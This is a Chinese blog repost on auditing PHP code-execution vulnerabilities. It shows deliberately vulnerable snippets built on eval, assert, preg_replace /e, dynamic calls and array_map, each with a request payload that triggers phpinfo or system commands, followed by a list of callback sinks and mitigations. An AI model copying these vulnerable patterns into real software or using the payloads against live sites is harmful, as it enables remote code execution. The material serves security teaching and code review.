php代码执行漏洞审计,[SaFeBug][代码审计]常见WEB漏洞代码层原理分析及利用方式之Php代码执行篇...

最新推荐文章于 2022-12-07 15:49:26 发布
最新推荐文章于 2022-12-07 15:49:26 发布
阅读量110 收藏
点赞数
文章标签: php代码执行漏洞审计

00x01

Php代码执行有很多种函数与利用方式,但是目前常见的还是以下几种函数。

eval(),assert(),preg_replace(),call_user_func(),array_map()等等函数1.eval(),assert函数

这两个函数原本的作用就是用来执行动态执行代码,所以他们的参数直接就是php代码

测试代码:

[PHP] 纯文本查看 复制代码<?php

$var = "var";

if (isset($_GET["arg"]))

{

$arg = $_GET["arg"];

eval("\$var = $arg;");

echo "\$var =".$var;

}

?>

请求/Php.php?arg=phpinfo();结果如下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.png (77.15 KB, 下载次数: 138)

2016-10-13 19:00 上传当然assert也是一样的

测试代码如下

[PHP] 纯文本查看 复制代码<?php

$var = "var";

if (isset($_GET["arg"]))

{

$arg = $_GET["arg"];

assert("\$var = $arg;");

echo "\$var =".$var;

}

?>

无非就是把eval替换为assert罢了.

访问/Php.php?arg=phpinfo();效果如下,图就不上了,效果一样的

2.preg_replace函数

preg_replace函数主要的作用是对字符串进行正则处理,代码之下的时候需要存在/e参数,这个参数原本是用来处理字符串的,因此漏洞出现最多的是在对字符串的处理,比如URL,HTML标签等。

它的参数于返回如下

[PHP] 纯文本查看 复制代码mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

pattern即第一个参数的代码注射。

当magic_quotes_gpc=Off时,导致代码执行。

[PHP] 纯文本查看 复制代码<?php

echo $regexp = $_GET['reg'];

$var = 'phpinfo()';

preg_replace("/(.*?)$regexp", '\\1', $var);

?>

请求/Php.php?reg=/e结果如下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

2.png (55.97 KB, 下载次数: 141)

2016-10-13 19:03 上传

第二段测试代码

[PHP] 纯文本查看 复制代码

preg_replace("/menzhi007/e",$_GET['h'],"jutst test");

?>

访问/Php.php?h=phpinfo()效果如下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

3.png (85.8 KB, 下载次数: 156)

2016-10-13 19:04 上传3.动态函数执行

Php动态函数写法为“变量(参数)”

测试代码如下:

[PHP] 纯文本查看 复制代码<?php

$_GET['a']($_GET['b']);

?>

访问/Php.php?a=assert&b=phpinfo()效果如下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

4.png (81.92 KB, 下载次数: 150)

2016-10-13 19:05 上传

第二段测试代码

[PHP] 纯文本查看 复制代码<?php

$dyn_func = $_GET['a'];

$argument = $_GET['b'];

$dyn_func($argument);

?>

访问/Php.php?a=system&b=ipconfig查看ip效果如下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

5.png (34.71 KB, 下载次数: 159)

2016-10-13 19:06 上传

4.array_map()函数的代码执行

其实array_map()函数原理跟eval(),assert1()函数原理差不多

[PHP] 纯文本查看 复制代码<?php

$evil_callback = $_GET['a'];

$some_array = array(0, 1, 2, 3);

$new_array = array_map($evil_callback, $some_array);

?>

访问/php.php?a=phpinfo即可执行phpinfo

8f3ff2fbfdd7c7c8339951a6542705fa.gif

6.png (80.27 KB, 下载次数: 160)

2016-10-13 19:09 上传

同类型函数还有很多我举例一些

array_map()

usort(), uasort(), uksort()

array_filter()

array_reduce()

array_diff_uassoc(), array_diff_ukey()

array_udiff(), array_udiff_assoc(), array_udiff_uassoc()

array_intersect_assoc(), array_intersect_uassoc()

array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()

array_walk(), array_walk_recursive()

xml_set_character_data_handler()

xml_set_default_handler()

xml_set_element_handler()

xml_set_end_namespace_decl_handler()

xml_set_external_entity_ref_handler()

xml_set_notation_decl_handler()

xml_set_processing_instruction_handler()

xml_set_start_namespace_decl_handler()

xml_set_unparsed_entity_decl_handler()

stream_filter_register()

set_error_handler()

register_shutdown_function()

register_tick_function()防范方法

1、尽量不要执行外部命令

2、使用自定义函数或函数库来替代外部命令的功能

3、使用escapeshellarg函数来处理命令参数

4、使用safe_mode_exec_dir指定可执行文件的路径

esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引号“"”,替换成“\"”,分号“;”替换成“\;”

用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内

[AppleScript] 纯文本查看 复制代码safe_mode = On

safe_mode_exec_di r= /usr/local/php/bin/

weixin_39915427
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第二阶段:PHP代码审计之SQL注入漏洞原理
qq_22132931的博客
11-16 203
第二阶段:PHP代码审计之SQL注入漏洞原理
php定时执行代码漏洞_常见PHP代码执行漏洞
weixin_35812176的博客
01-14 230
1. 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>2. 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、...
PHP代码审计(全)
sechelper的博客
12-07 3802
PHP代码审计全流程,黑白盒测试,小技巧,实操案例
4.代码审计代码注入
推理小孩的博客
01-18 225
4.代码审计代码注入 PHP 代码审计代码执行注入 所谓的代码执行注入就是 在php里面有些函数中输入的字符串参数会当做PHP代码执行。 如此的文章里面就大有文章可以探究了 一 常见代码执行函数   Eval,assert,preg_replace   Eval函数在PHP手册里面的意思是:将输入的字符串编程PHP代码 测试代码如下,然后在UR...
远程命令执行
Snowflake1997的博客
03-02 562
eval() 函数用来执行一个字符串表达式,并返回表达式的值。 文件命名为4.php <?php $var = "var"; if(isset($_GET['arg'])){ $arg = $_GET['arg']; eval("\$var = $arg;"); //‘\’的作用是让它识别成字符,不识别成变量 echo "\$var =".$var; } ?> 文件命名为eval.php <?php if(isset($_GET['a'])){ eval(
PHP代码审计基础:代码执行漏洞
1匹黑马
11-26 281
文章目录代码执行漏洞挖掘思路常见危险函数eval()和assert()回调函数动态执行函数preg_replace()代码执行第一个参数第二个参数第三个参数修复方案 代码执行漏洞 PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行。该漏洞主要存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中。 挖掘思路 用户能够控制函数的输入 存在可执行代码的危险函数 常见危险函数 eval()和asser
PHP代码审计基础:命令执行漏洞
1匹黑马
11-27 1608
文章目录命令执行挖掘思路命令执行代码执行的区别命令执行的类型常见危险函数system()和passthru()exec()shell_exec()过滤函数escapeshellcmd()escapeshellarg()修复方案 命令执行 1、命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 2、命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码执行 3、更常见的命令执行漏洞是发生在各种We
基于正反向分析的SQL,XSS漏洞检测系统(php代码审计web版)
最新发布
07-19
基于正反向分析的SQL,XSS漏洞检测系统(php代码审计web版) 用户角色 管理员 admin 123456 模块介绍 登陆模块 sql文件静态分析模块 phparser树形处理,json返回处理结果 sql显示image模块 graphviz生成pdf文件...
PHP-CGI远程代码执行漏洞分析与防范
10-19
4. 代码审计与维护:定期对Web应用进行代码审计,及时发现并修复可能导致远程代码执行漏洞。 5. 服务器安全策略:确保服务器运行在安全的配置下,如启用安全的用户权限管理、最小化服务安装等。 6. 关注安全动态...
php代码审计-代码执行.pdf
12-14
代码审计可以检查代码中是否存在安全漏洞,例如 eval() 函数、assert() 函数、preg_replace() 函数等。 例如,我们可以使用以下方式来检查代码中是否存在 eval() 函数: ```php <?php $search = 'eval'; $code = ...
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
PHP代码执行漏洞总结大全
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PHP代码注入PHP语言常见注入函数以及PHP代码注入漏洞利用实例
m0_64378913的博客
06-26 7157
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
热门推荐
weixin_43263451的博客
03-30 1万+
大概思路就是我们可以修改requests类的filter属性、method属性以及get属性的值,从而在调用param方法时,call_user_func_array的值我们就可以控制,造成了远程代码执行漏洞。 0. 大致流程 经过入口文件进入run函数 首先在116行根据url获取调度信息时,触发变量覆盖漏洞从而修改requests对象的属性值,然后获取?s=captcha的调度信息并返回给$dispatch 再到139行进入exec函数并将$dispatch作为参数带入 跟进后根据$dispatch
阐述php命令执行漏洞原理,命令执行代码执行漏洞原理
weixin_39928102的博客
04-12 191
注:本文仅供参考学习命令执行定义当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。形成原因脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底,如果我们开发的应用需要一些除去web的特殊功能时,就需要调...
php代码执行漏洞总结
weixin_44255856的博客
07-23 667
代码执行函数 PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等 <?php echo `dir`; ?> 二 文件包含代码注射 文件包含函数在特定条件下的代码注射,如include()、include_once()、 ...
assert()代码执行漏洞
qq_33505576的博客
07-01 3230
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执...
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5778
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
php任意代码执行漏洞浅析
Hydra的博客
11-20 6935
漏洞成因  当应用在调用一些能将字符转化为代码的函数(如PHP中的eval,assert)时,没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞常见函数 php:eval,assert python:exec 区别 eval与assert区别 eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: ...
PHP代码审计代码执行漏洞深度剖析
通过代码审计,开发者和安全专家可以识别并修复潜在的安全漏洞,防止恶意攻击者利用这些漏洞执行任意代码。 一、介绍 在PHP应用程序中,有些功能允许将字符串转化为可执行代码。如果攻击者能够控制这些字符串,他们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值